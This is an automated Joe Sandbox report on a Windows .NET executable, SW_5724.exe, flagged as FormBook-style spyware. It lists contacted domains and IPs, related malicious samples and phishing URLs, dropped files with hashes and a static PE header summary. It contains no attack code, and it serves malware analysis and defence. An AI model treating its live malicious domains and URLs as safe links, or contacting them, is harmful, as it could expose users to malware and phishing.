                                                                                108.179.253.197
                                                                                		bloodbalancecaps.shopUnited States
                                                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                                                38.47.207.164
                                                                                		t19yd.topUnited States
                                                                                		174COGENT-174UStrue
                                                                                199.59.243.227
                                                                                		www.whisperart.netUnited States
                                                                                		395082BODIS-NJUStrue
                                                                                84.32.84.32
                                                                                		appsolucao.shopLithuania
                                                                                		33922NTT-LT-ASLTtrue
                                                                                172.67.156.195
                                                                                		www.ana-silverco.shopUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                208.115.225.220
                                                                                		www.atendefacil.infoUnited States
                                                                                		46475LIMESTONENETWORKSUStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1567396
                                                                                Start date and time:2024-12-03 14:19:47 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 11m 8s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:12
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:SW_5724.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@13/7@15/9
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 87%
                                                                                • Number of executed functions: 93
                                                                                • Number of non-executed functions: 283
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: SW_5724.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                08:20:38API Interceptor1x Sleep call for process: SW_5724.exe modified
                                                                                08:20:40API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                08:21:44API Interceptor10265490x Sleep call for process: regini.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                104.21.15.1005674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • www.sitioseguro.blog/6o0x/
                                                                                13.248.169.48attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.aktmarket.xyz/wb7v/
                                                                                YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/k1td/
                                                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • www.optimismbank.xyz/98j3/
                                                                                lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                • www.avalanchefi.xyz/ctta/
                                                                                BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/k1td/
                                                                                PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                • www.heliopsis.xyz/69zn/
                                                                                1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.gupiao.bet/t3a1/
                                                                                Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.hasan.cloud/tur7/
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • www.egyshare.xyz/lp5b/
                                                                                attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.aktmarket.xyz/wb7v/
                                                                                209.74.77.107quotation.exeGet hashmaliciousFormBookBrowse
                                                                                • www.gadgetre.info/8q8w/
                                                                                Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.beyondfitness.live/fbpt/
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.gadgetre.info/8q8w/
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.gadgetre.info/8q8w/
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                • www.beyondfitness.live/fbpt/
                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.ana-silverco.shopquotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.90.137
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.90.137
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.90.137
                                                                                www.sitioseguro.blogfile.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.162.39
                                                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.162.39
                                                                                5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.15.100
                                                                                www.remedies.proCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                www.whisperart.netfile.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227
                                                                                www.egyshare.xyzCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                www.dating-apps-az-dn5.xyzA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                MULTIBAND-NEWHOPEUS72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.79.42
                                                                                quotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.109
                                                                                Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.64.187
                                                                                Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.109
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                UNIFIEDLAYER-AS-1USPAGAMENTO CREDIT_AGRICOLE.docGet hashmaliciousXWormBrowse
                                                                                • 192.254.232.209
                                                                                fred.htmlGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 173.254.24.56
                                                                                Po-AD841.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 108.179.234.136
                                                                                V-Mail.msgGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                [EXTERNAL] Fw_ LVW 1201831..emlGet hashmaliciousUnknownBrowse
                                                                                • 69.49.230.198
                                                                                ATT4802.htmlGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                http://calcuttaclub.in/images/uanjodgs/florida-access/Get hashmaliciousUnknownBrowse
                                                                                • 162.214.50.135
                                                                                https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                                                • 108.167.188.62
                                                                                CLOUDFLARENETUS0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.6
                                                                                Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.6
                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.67.152
                                                                                72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.218.146
                                                                                quotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.90.137
                                                                                0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                PO# BBGR2411PO69.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                AMAZON-02USNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 54.179.173.60
                                                                                0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 54.150.207.131
                                                                                NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                • 108.158.75.92
                                                                                https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                • 13.227.8.37
                                                                                https://chargeview.liveGet hashmaliciousUnknownBrowse
                                                                                • 3.122.217.79
                                                                                a-r.m-6.SNOOPY.elfGet hashmaliciousGafgytBrowse
                                                                                • 54.171.230.55
                                                                                phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                                                • 54.231.135.120
                                                                                https://searchandprint.recipesGet hashmaliciousUnknownBrowse
                                                                                • 108.158.75.111
                                                                                https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                • 52.19.224.221
                                                                                Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                • 45.112.123.126

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SW_5724.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\SW_5724.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2232
                                                                                Entropy (8bit):5.380046556058007
                                                                                Encrypted:false
                                                                                SSDEEP:48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//Z9yus:tLHxv2IfLZ2KRH6OugQs
                                                                                MD5:DACB2D19CCFBAB625A2060875B8A45E6
                                                                                SHA1:FA7ED094A2F8F9FA0339CBE9BC146C1ACFB24D9F
                                                                                SHA-256:66FD1F81EEB5263995FB08102922F4285043BE2000D2D69BF1F1945604567D83
                                                                                SHA-512:AA2BE1B3E2E71C47BA0D4A3C6DD1F93C6D3E0F5E286B4B8BE279B036DA0FF6354AEE59AEF3CEB56B8C3C876B26936C5160D83A1989B2968F830A2C98C4AA2A0A
                                                                                Malicious:false
                                                                                Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                C:\Users\user\AppData\Local\Temp\174EBI30

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\regini.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ezs5a21.plq.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ty1tgju.kpa.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezxo0nda.2mm.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s41ush1g.nxb.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.77502850329395
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:SW_5724.exe
                                                                                File size:814'592 bytes
                                                                                MD5:cf8c34b20f0e8654371c004272b4def6
                                                                                SHA1:1c81b7ac021345bd328e7cabee98979a1923d5b3
                                                                                SHA256:61890e63d7ba75eeccb7bf59ab004ab2aa94e463137a8fbb162d40921a8aa59f
                                                                                SHA512:2923eb6c6f248b0ace5b6ee8aed7c53f899645cc2c57fd2b2e1ce4538e9becc6b91500aa0b69009137633c96b36a57960787594599df5d69c94543162071b82b
                                                                                SSDEEP:12288:IYOSIR4R52J+XtG/EGHxCwnYxejZoCo391AMPWcZYI0G2YJMgbr17IrNA03pYIR:I5SIee//VXjytFZYI0GvJM6h7VI
                                                                                TLSH:8C05F19C3601F54FC91782314AB1ED74AA686DFE970782039AD72EEFF91DC568E041E2
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0......P.......:... ...@....@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:033424c4c199d839

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4c3a2e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x674EA0EF [Tue Dec 3 06:10:55 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc39d40x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x4ca8.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
